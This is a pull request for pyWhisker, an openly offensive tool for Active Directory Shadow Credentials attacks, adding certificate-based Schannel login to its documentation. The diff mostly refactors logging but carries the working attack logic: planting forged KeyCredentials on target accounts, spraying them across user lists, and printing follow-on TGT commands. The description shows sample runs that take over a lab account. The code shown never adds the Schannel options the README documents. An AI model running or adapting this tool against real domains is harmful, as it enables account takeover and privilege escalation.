### PR TITLE
Added support to use PassTheCert 

### DIFF
--- a/README.md
+++ b/README.md
@@ -39,14 +39,16 @@ pyWhisker supports the following authentications:
  - (Kerberos) Cleartext password
  - (Kerberos) [Pass-the-key](https://www.thehacker.recipes/active-directory-domain-services/movement/kerberos/pass-the-key) / [Overpass-the-hash](https://www.thehacker.recipes/active-directory-domain-services/movement/kerberos/overpass-the-hash)
  - (Kerberos) [Pass-the-cache](https://www.thehacker.recipes/active-directory-domain-services/movement/kerberos/pass-the-cache) (type of [Pass-the-ticket](https://www.thehacker.recipes/active-directory-domain-services/movement/kerberos/pass-the-ticket))
+ - (LDAP over Schannel) [Pass-the-cert](https://www.thehacker.recipes/ad/movement/schannel/passthecert)
 
 Among other things, pyWhisker supports multi-level verbosity, just append `-v`, `-vv`, ... to the command :)
 
 pyWhisker can also do cross-domain, see the `-td/--target-domain` argument.
 
 ```
-usage: pywhisker.py [-h] (-t TARGET_SAMNAME | -tl TARGET_SAMNAME_LIST) [-a [{list,add,spray,remove,clear,info,export,import}]] [--use-ldaps] [-v] [-q] [--dc-ip ip address] [-d DOMAIN]
-                    [-u USER] [-td TARGET_DOMAIN] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k] [-P PFX_PASSWORD] [-f FILENAME] [-e {PEM,PFX}] [-D DEVICE_ID]
+usage: pywhisker [-h] (-t TARGET_SAMNAME | -tl TARGET_SAMNAME_LIST) [-a [{list,add,spray,remove,clear,info,export,import}]] [--use-ldaps] [--use-schannel] [-v] [-q]
+                 [--dc-ip ip address] [-d DOMAIN] [-u USER] [-crt CERTFILE] [-key KEYFILE] [-td TARGET_DOMAIN] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]
+                 [-k] [-P PFX_PASSWORD] [-f FILENAME] [-e {PEM,PFX}] [-D DEVICE_ID]
 
 Python (re)setter for property msDS-KeyCredentialLink for Shadow Credentials attacks.
 
@@ -59,6 +61,7 @@ optional arguments:
   -a [{list,add,spray,remove,clear,info,export,import}], --action [{list,add,spray,remove,clear,info,export,import}]
                         Action to operate on msDS-KeyCredentialLink
   --use-ldaps           Use LDAPS instead of LDAP
+  --use-schannel        Use LDAP Schannel (TLS) for certificate-based authentication
   -v, --verbose         verbosity level (-v for verbose, -vv for debug)
   -q, --quiet           show no information at all
 
@@ -67,6 +70,10 @@ authentication & connection:
   -d DOMAIN, --domain DOMAIN
                         (FQDN) domain to authenticate to
   -u USER, --user USER  user to authenticate with
+  -crt, --certfile CERTFILE
+                        Path to the user certificate (PEM format) for Schannel authentication
+  -key, --keyfile KEYFILE
+                        Path to the user private key (PEM format) for Schannel authentication
   -td TARGET_DOMAIN, --target-domain TARGET_DOMAIN
                         Target domain (if different than the domain of the authenticating user)
 

--- a/pywhisker/pywhisker.py
+++ b/pywhisker/pywhisker.py
@@ -247,7 +247,7 @@ def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='
     return True
 
 class ShadowCredentials(object):
-    def __init__(self, ldap_server, ldap_session, target_samname, target_domain=None):
+    def __init__(self, ldap_server, ldap_session, target_samname, target_domain=None, logger=None):
         super(ShadowCredentials, self).__init__()
         self.ldap_server = ldap_server
         self.ldap_session = ldap_session
@@ -255,21 +255,25 @@ class ShadowCredentials(object):
         self.target_samname = target_samname
         self.target_dn = None
         self.target_domain_dn = ','.join(f'DC={component}' for component in target_domain.split('.')) if target_domain is not None else None
-        logger.debug('Initializing domainDumper()')
+        if logger is None:
+            self.logger = Logger(0,False)
+        else:
+            self.logger = logger
+        self.logger.debug('Initializing domainDumper()')
         cnf = ldapdomaindump.domainDumpConfig()
         cnf.basepath = None
         self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf, root=self.target_domain_dn)
 
 
     def info(self, device_id):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
+            self.logger.info("Target user found: %s" % self.target_dn)
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -277,7 +281,7 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             device_id_in_current_values = False
@@ -287,25 +291,25 @@ class ShadowCredentials(object):
                     logger.warning("Failed to parse DeviceId for keyCredential: %s" % (str(dn_binary_value)))
                     continue
                 if keyCredential.DeviceId.toFormatD() == device_id:
-                    logger.success("Found device Id")
+                    self.logger.success("Found device Id")
                     keyCredential.show()
                     device_id_in_current_values = True
             if not device_id_in_current_values:
-                logger.warning("No value with the provided DeviceID was found for the target object")
+                self.logger.warning("No value with the provided DeviceID was found for the target object")
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
 
     def list(self):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
+            self.logger.info("Target user found: %s" % self.target_dn)
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -313,43 +317,43 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             if len(results['raw_attributes']['msDS-KeyCredentialLink']) == 0:
-                logger.info('Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute')
+                self.logger.info('Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute')
             else:
-                logger.info("Listing devices for %s" % self.target_samname)
+                self.logger.info("Listing devices for %s" % self.target_samname)
                 for dn_binary_value in results['raw_attributes']['msDS-KeyCredentialLink']:
                     keyCredential = KeyCredential.fromDNWithBinary(DNWithBinary.fromRawDNWithBinary(dn_binary_value))
+                    
                     if keyCredential.DeviceId is None:
-                        logger.warning("Failed to parse DeviceId for keyCredential: %s" % (str(dn_binary_value)))
-                        logger.warning("DeviceID: %s | Creation Time (UTC): %s" % (keyCredential.DeviceId, keyCredential.CreationTime))
+                        self.logger.warning("Failed to parse DeviceId for keyCredential: %s" % (str(dn_binary_value)))
+                        self.logger.warning("DeviceID: %s | Creation Time (UTC): %s" % (keyCredential.DeviceId, keyCredential.CreationTime))
                     else:
-                        logger.info("DeviceID: %s | Creation Time (UTC): %s" % (keyCredential.DeviceId.toFormatD(), keyCredential.CreationTime))
-
+                        self.logger.info("DeviceID: %s | Creation Time (UTC): %s" % (keyCredential.DeviceId.toFormatD(), keyCredential.CreationTime))
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
     def add(self, password, path, export_type, domain, target_domain):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
-        logger.info("Generating certificate")
+            self.logger.info("Target user found: %s" % self.target_dn)
+        self.logger.info("Generating certificate")
         certificate = X509Certificate2(subject=self.target_samname, keySize=2048, notBefore=(-40*365), notAfter=(40*365))
-        logger.info("Certificate generated")
-        logger.info("Generating KeyCredential")
+        self.logger.info("Certificate generated")
+        self.logger.info("Generating KeyCredential")
         keyCredential = KeyCredential.fromX509Certificate2(certificate=certificate, deviceId=Guid(), owner=self.target_dn, currentTime=DateTime())
-        logger.info("KeyCredential generated with DeviceID: %s" % keyCredential.DeviceId.toFormatD())
+        self.logger.info("KeyCredential generated with DeviceID: %s" % keyCredential.DeviceId.toFormatD())
         if args.verbosity == 2:
             keyCredential.fromDNWithBinary(keyCredential.toDNWithBinary()).show()
-        logger.debug("KeyCredential: %s" % keyCredential.toDNWithBinary().toString())
+        self.logger.debug("KeyCredential: %s" % keyCredential.toDNWithBinary().toString())
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -357,61 +361,61 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [keyCredential.toDNWithBinary().toString()]
-            logger.info("Updating the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
+            self.logger.info("Updating the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
             self.ldap_session.modify(self.target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
             if self.ldap_session.result['result'] == 0:
-                logger.success("Updated the msDS-KeyCredentialLink attribute of the target object")
+                self.logger.success("Updated the msDS-KeyCredentialLink attribute of the target object")
                 if path is None:
                     path = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8))
-                    logger.verbose("No filename was provided. The certificate(s) will be stored with the filename: %s" % path)
+                    self.logger.verbose("No filename was provided. The certificate(s) will be stored with the filename: %s" % path)
                 if export_type == "PEM":
                     certificate.ExportPEM(path_to_files=path)
-                    logger.success("Saved PEM certificate at path: %s" % path + "_cert.pem")
-                    logger.success("Saved PEM private key at path: %s" % path + "_priv.pem")
-                    logger.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
-                    logger.verbose("Run the following command to obtain a TGT")
-                    logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pem %s_cert.pem -key-pem %s_priv.pem %s/%s %s.ccache" % (path, path, target_domain if target_domain is not None else domain, self.target_samname, path))
+                    self.logger.success("Saved PEM certificate at path: %s" % path + "_cert.pem")
+                    self.logger.success("Saved PEM private key at path: %s" % path + "_priv.pem")
+                    self.logger.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
+                    self.logger.verbose("Run the following command to obtain a TGT")
+                    self.logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pem %s_cert.pem -key-pem %s_priv.pem %s/%s %s.ccache" % (path, path, target_domain if target_domain is not None else domain, self.target_samname, path))
                 elif export_type == "PFX":
                     if password is None:
                         password = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20))
-                        logger.verbose("No pass was provided. The certificate will be stored with the password: %s" % password)
+                        self.logger.verbose("No pass was provided. The certificate will be stored with the password: %s" % password)
                     certificate.ExportPFX(password=password, path_to_file=path)
-                    logger.success("Saved PFX (#PKCS12) certificate & key at path: %s" % path + ".pfx")
-                    logger.info("Must be used with password: %s" % password)
-                    logger.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
-                    logger.verbose("Run the following command to obtain a TGT")
-                    logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pfx %s.pfx -pfx-pass %s %s/%s %s.ccache" % (path, password, target_domain if target_domain is not None else domain, self.target_samname, path))
+                    self.logger.success("Saved PFX (#PKCS12) certificate & key at path: %s" % path + ".pfx")
+                    self.logger.info("Must be used with password: %s" % password)
+                    self.logger.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
+                    self.logger.verbose("Run the following command to obtain a TGT")
+                    self.logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pfx %s.pfx -pfx-pass %s %s/%s %s.ccache" % (path, password, target_domain if target_domain is not None else domain, self.target_samname, path))
             else:
                 if self.ldap_session.result['result'] == 50:
-                    logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
+                    self.logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
                 elif self.ldap_session.result['result'] == 19:
-                    logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
+                    self.logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
                 else:
-                    logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
+                    self.logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
 
     def spray(self, password, path, export_type, domain, target_domain):
-        logger.info("Performing attempts to add msDS-KeyCredentialLink for a list of users")
+        self.logger.info("Performing attempts to add msDS-KeyCredentialLink for a list of users")
         if type(self.target_samname) == str:
             self.target_samname = [self.target_samname]
         if path is None:
             path = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8))
-            logger.verbose("No filename was provided. The certificate(s) will be stored with the filename: <USERNAME>_%s" % path)
+            self.logger.verbose("No filename was provided. The certificate(s) will be stored with the filename: <USERNAME>_%s" % path)
         if export_type == "PFX" and password is None:
             password = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20))
-            logger.verbose("No pass was provided. The certificate will be stored with the password: %s" % password)
+            self.logger.verbose("No pass was provided. The certificate will be stored with the password: %s" % password)
         targets_owned = []
         for samname in self.target_samname:
             result = self.get_dn_sid_from_samname(samname)
             if not result:
-                #logger.error(f'Target account does not exist! (wrong domain?): {samname}')
+                #self.logger.error(f'Target account does not exist! (wrong domain?): {samname}')
                 continue
             else:
                 self.target_dn = result[0]
@@ -424,42 +428,42 @@ class ShadowCredentials(object):
                     continue
                 results = entry
             if not results:
-                #logger.error(f'Could not query target user properties: {samname}')
+                #self.logger.error(f'Could not query target user properties: {samname}')
                 continue
             try:
                 new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [keyCredential.toDNWithBinary().toString()]
                 self.ldap_session.modify(self.target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
                 if self.ldap_session.result['result'] == 0:
                     targets_owned.append(samname)
-                    logger.success(f"Updated the msDS-KeyCredentialLink attribute of the target object: {samname}")
+                    self.logger.success(f"Updated the msDS-KeyCredentialLink attribute of the target object: {samname}")
                     if export_type == "PEM":
                         certificate.ExportPEM(path_to_files=f'{samname}_{path}')
-                        logger.info(f"Saved PEM certificate for {samname} at path {samname + '_' + path + '_cert.pem'}, PEM private key at path {samname + '_' + path + '_priv.pem'}")
+                        self.logger.info(f"Saved PEM certificate for {samname} at path {samname + '_' + path + '_cert.pem'}, PEM private key at path {samname + '_' + path + '_priv.pem'}")
                     elif export_type == "PFX":
                         certificate.ExportPFX(password=password, path_to_file=f'{samname}_{path}')
-                        logger.info(f"Saved PFX (#PKCS12) certificate & key for {samname} at path {samname + '_' + path + '.pfx'}, the password is {password}")
+                        self.logger.info(f"Saved PFX (#PKCS12) certificate & key for {samname} at path {samname + '_' + path + '.pfx'}, the password is {password}")
             except IndexError:
-                logger.info('Attribute msDS-KeyCredentialLink does not exist')
+                self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         if not targets_owned:
-            logger.warning("No user object was modified during the spray")
+            self.logger.warning("No user object was modified during the spray")
         else:
-            logger.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
-            logger.verbose("Run the following command to obtain a TGT")
+            self.logger.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
+            self.logger.verbose("Run the following command to obtain a TGT")
             if export_type == "PEM":
-                logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pem <USERNAME>_%s_cert.pem -key-pem <USERNAME>_%s_priv.pem %s/<USERNAME> <USERNAME>.ccache" % (path, path, target_domain if target_domain is not None else domain))
+                self.logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pem <USERNAME>_%s_cert.pem -key-pem <USERNAME>_%s_priv.pem %s/<USERNAME> <USERNAME>.ccache" % (path, path, target_domain if target_domain is not None else domain))
             elif export_type == "PFX":
-                logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pfx <USERNAME>_%s.pfx -pfx-pass %s %s/<USERNAME> <USERNAME>.ccache" % (path, password, target_domain if target_domain is not None else domain))
+                self.logger.verbose("python3 PKINITtools/gettgtpkinit.py -cert-pfx <USERNAME>_%s.pfx -pfx-pass %s %s/<USERNAME> <USERNAME>.ccache" % (path, password, target_domain if target_domain is not None else domain))
 
 
     def remove(self, device_id):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
+            self.logger.info("Target user found: %s" % self.target_dn)
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -467,7 +471,7 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             new_values = []
@@ -478,38 +482,38 @@ class ShadowCredentials(object):
                     logger.warning("Failed to parse DeviceId for keyCredential: %s" % (str(dn_binary_value)))
                     continue
                 if keyCredential.DeviceId.toFormatD() == device_id:
-                    logger.info("Found value to remove")
+                    self.logger.info("Found value to remove")
                     device_id_in_current_values = True
                 else:
                     new_values.append(dn_binary_value)
             if device_id_in_current_values:
-                logger.info("Updating the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
+                self.logger.info("Updating the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
                 self.ldap_session.modify(self.target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
                 if self.ldap_session.result['result'] == 0:
-                    logger.success("Updated the msDS-KeyCredentialLink attribute of the target object")
+                    self.logger.success("Updated the msDS-KeyCredentialLink attribute of the target object")
                 else:
                     if self.ldap_session.result['result'] == 50:
-                        logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
+                        self.logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
                     elif self.ldap_session.result['result'] == 19:
-                        logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
+                        self.logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
                     else:
-                        logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
+                        self.logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
             else:
-                logger.error("No value with the provided DeviceID was found for the target object")
+                self.logger.error("No value with the provided DeviceID was found for the target object")
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
 
     def clear(self):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
+            self.logger.info("Target user found: %s" % self.target_dn)
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -517,38 +521,38 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             if len(results['raw_attributes']['msDS-KeyCredentialLink']) == 0:
-                logger.info('Attribute msDS-KeyCredentialLink is empty')
+                self.logger.info('Attribute msDS-KeyCredentialLink is empty')
             else:
-                logger.info("Clearing the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
+                self.logger.info("Clearing the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
                 self.ldap_session.modify(self.target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, []]})
                 if self.ldap_session.result['result'] == 0:
-                    logger.success('msDS-KeyCredentialLink cleared successfully!')
+                    self.logger.success('msDS-KeyCredentialLink cleared successfully!')
                 else:
                     if self.ldap_session.result['result'] == 50:
-                        logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
+                        self.logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
                     elif self.ldap_session.result['result'] == 19:
-                        logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
+                        self.logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
                     else:
-                        logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
+                        self.logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
                 return
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
 
     def importFromJSON(self, filename):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
+            self.logger.info("Target user found: %s" % self.target_dn)
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -556,7 +560,7 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             if os.path.exists(filename):
@@ -568,32 +572,32 @@ class ShadowCredentials(object):
                             keyCredentials.append(KeyCredential.fromDict(kcjson).toDNWithBinary().toString())
                         elif type(kcjson) == str:
                             keyCredentials.append(kcjson)
-            logger.info("Modifying the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
+            self.logger.info("Modifying the msDS-KeyCredentialLink attribute of %s" % self.target_samname)
             self.ldap_session.modify(self.target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, keyCredentials]})
             if self.ldap_session.result['result'] == 0:
-                logger.success('msDS-KeyCredentialLink modified successfully!')
+                self.logger.success('msDS-KeyCredentialLink modified successfully!')
             else:
                 if self.ldap_session.result['result'] == 50:
-                    logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
+                    self.logger.error('Could not modify object, the server reports insufficient rights: %s' % self.ldap_session.result['message'])
                 elif self.ldap_session.result['result'] == 19:
-                    logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
+                    self.logger.error('Could not modify object, the server reports a constrained violation: %s' % self.ldap_session.result['message'])
                 else:
-                    logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
+                    self.logger.error('The server returned an error: %s' % self.ldap_session.result['message'])
             return
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
 
     def exportToJSON(self, filename):
-        logger.info("Searching for the target account")
+        self.logger.info("Searching for the target account")
         result = self.get_dn_sid_from_samname(self.target_samname)
         if not result:
-            logger.error('Target account does not exist! (wrong domain?)')
+            self.logger.error('Target account does not exist! (wrong domain?)')
             return
         else:
             self.target_dn = result[0]
-            logger.info("Target user found: %s" % self.target_dn)
+            self.logger.info("Target user found: %s" % self.target_dn)
         self.ldap_session.search(self.target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['SAMAccountName', 'objectSid', 'msDS-KeyCredentialLink'])
         results = None
         for entry in self.ldap_session.response:
@@ -601,12 +605,12 @@ class ShadowCredentials(object):
                 continue
             results = entry
         if not results:
-            logger.error('Could not query target user properties')
+            self.logger.error('Could not query target user properties')
             return
         try:
             if filename is None:
                 filename = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8)) + ".json"
-                logger.verbose("No filename was provided. The keyCredential(s) will be stored with the filename: %s" % filename)
+                self.logger.verbose("No filename was provided. The keyCredential(s) will be stored with the filename: %s" % filename)
             if len(os.path.dirname(filename)) != 0:
                 if not os.path.exists(os.path.dirname(filename)):
                     os.makedirs(os.path.dirname(filename), exist_ok=True)
@@ -620,9 +624,9 @@ class ShadowCredentials(object):
                     keyCredentialsJSON["keyCredentials"].append(dn_binary_value.decode())
             with open(filename, "w") as f:
                 f.write(json.dumps(keyCredentialsJSON, indent=4))
-            logger.success("Saved JSON dump at path: %s" % filename)
+            self.logger.success("Saved JSON dump at path: %s" % filename)
         except IndexError:
-            logger.info('Attribute msDS-KeyCredentialLink does not exist')
+            self.logger.info('Attribute msDS-KeyCredentialLink does not exist')
         return
 
 
@@ -633,7 +637,7 @@ class ShadowCredentials(object):
             sid = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])
             return dn, sid
         except IndexError:
-            logger.error('User not found in LDAP: %s' % samname)
+            self.logger.error('User not found in LDAP: %s' % samname)
             return False
 
     def get_sid_info(self, sid):
@@ -643,7 +647,7 @@ class ShadowCredentials(object):
             samname = self.ldap_session.entries[0]['samaccountname']
             return dn, samname
         except IndexError:
-            logger.error('SID not found in LDAP: %s' % sid)
+            self.logger.error('SID not found in LDAP: %s' % sid)
             return False
 
 
@@ -651,6 +655,7 @@ class Logger(object):
     def __init__(self, verbosity=0, quiet=False):
         self.verbosity = verbosity
         self.quiet = quiet
+        self.console = Console()
         if verbosity == 3:
             print("(╯°□°）╯︵ ┻━┻ WHAT HAVE YOU DONE !? (╯°□°）╯︵ ┻━┻")
             exit(0)
@@ -728,27 +733,27 @@ class Logger(object):
 
     def debug(self, message):
         if self.verbosity == 2:
-            console.print("{}[DEBUG]{} {}".format("[yellow3]", "[/yellow3]", message), highlight=False)
+            self.console.print("{}[DEBUG]{} {}".format("[yellow3]", "[/yellow3]", message), highlight=False)
 
     def verbose(self, message):
         if self.verbosity >= 1:
-            console.print("{}[VERBOSE]{} {}".format("[blue]", "[/blue]", message), highlight=False)
+            self.console.print("{}[VERBOSE]{} {}".format("[blue]", "[/blue]", message), highlight=False)
 
     def info(self, message):
         if not self.quiet:
-            console.print("{}[*]{} {}".format("[bold blue]", "[/bold blue]", message), highlight=False)
+            self.console.print("{}[*]{} {}".format("[bold blue]", "[/bold blue]", message), highlight=False)
 
     def success(self, message):
         if not self.quiet:
-            console.print("{}[+]{} {}".format("[bold green]", "[/bold green]", message), highlight=False)
+            self.console.print("{}[+]{} {}".format("[bold green]", "[/bold green]", message), highlight=False)
 
     def warning(self, message):
         if not self.quiet:
-            console.print("{}[-]{} {}".format("[bold orange3]", "[/bold orange3]", message), highlight=False)
+            self.console.print("{}[-]{} {}".format("[bold orange3]", "[/bold orange3]", message), highlight=False)
 
     def error(self, message):
         if not self.quiet:
-            console.print("{}[!]{} {}".format("[bold red]", "[/bold red]", message), highlight=False)
+            self.console.print("{}[!]{} {}".format("[bold red]", "[/bold red]", message), highlight=False)
 
 
 def parse_args():
@@ -803,7 +808,6 @@ def main():
     #if args.action == 'write' and args.delegate_from is None:
         #logger.error('`-delegate-from` should be specified when using `-action write` !')
         #sys.exit(1)
-    
     args = parse_args()
     logger = Logger(args.verbosity, args.quiet)
 
@@ -834,7 +838,7 @@ def main():
 
     try:
         ldap_server, ldap_session = init_ldap_session(args=args, domain=args.auth_domain, username=args.auth_username, password=args.auth_password, lmhash=auth_lm_hash, nthash=auth_nt_hash)
-        shadowcreds = ShadowCredentials(ldap_server, ldap_session, target_samname, target_domain)
+        shadowcreds = ShadowCredentials(ldap_server, ldap_session, target_samname, target_domain, logger)
         if args.action == 'list':
             shadowcreds.list()
         elif args.action == 'add':
@@ -857,5 +861,4 @@ def main():
         logger.error(str(e))
 
 if __name__ == '__main__':
-    console = Console()
     main()


### PR DESCRIPTION
Initial PR for adding [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) support to pywhisker. 

This will take in a crt and key file extracted from a pfx using Certipy. It lets the user auth using Schannel via LDAP with the certificate and key. 

Ex:
```
jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a list
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

jp@sprocket ~> pywhisker -d thegrid.com --dc-ip 192.168.0.180 --use-schannel -crt admin.crt -key admin.key -t kflynn -a add
[*] Searching for the target account
[*] Target user found: CN=Kevin Flynn,CN=Users,DC=thegrid,DC=com
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 1e22caec-4696-5c0a-8de4-6566fd89dea3
[*] Updating the msDS-KeyCredentialLink attribute of kflynn
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: JUuz6p3L.pfx
[*] Must be used with password: sWBNBeZM2X5XNHczUFJn
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

